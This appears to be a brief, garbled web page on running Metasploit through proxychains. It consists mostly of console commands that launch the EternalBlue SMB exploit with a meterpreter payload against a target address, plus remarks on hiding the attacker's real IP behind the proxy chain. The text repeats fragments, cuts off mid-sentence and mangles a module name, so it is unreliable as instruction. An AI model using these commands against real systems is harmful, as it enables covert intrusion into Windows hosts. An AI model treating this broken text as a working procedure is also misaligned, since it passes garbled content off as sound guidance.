Metasploit With Proxychains Jun 2026
sudo proxychains4 msfconsole
In the world of red teaming and penetration testing, two truths are universal: metasploit with proxychains
Notice that every packet is wrapped in the proxy chain, making the scan appear from your pivot host, not your attack box. sudo proxychains4 msfconsole In the world of red
The returned IP should be the exit node of your proxy chain, not your real IP. not your real IP. msf >
msf > use exploit/windows/smb/ms17_010_p EternalBlue msf (ms17_010_p EternalBlue) > set LHOST 127.0.0.1 msf (ms17_010_p EternalBlue) > set LPORT 4444 msf (ms17_010_p EternalBlue) > exploit
proxychains msfconsole msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set RHOSTS 10.10.10.10 msf6 > set PAYLOAD windows/x64/meterpreter/bind_tcp # NOT reverse_tcp msf6 > set LPORT 4444 msf6 > exploit
proxychains msfconsole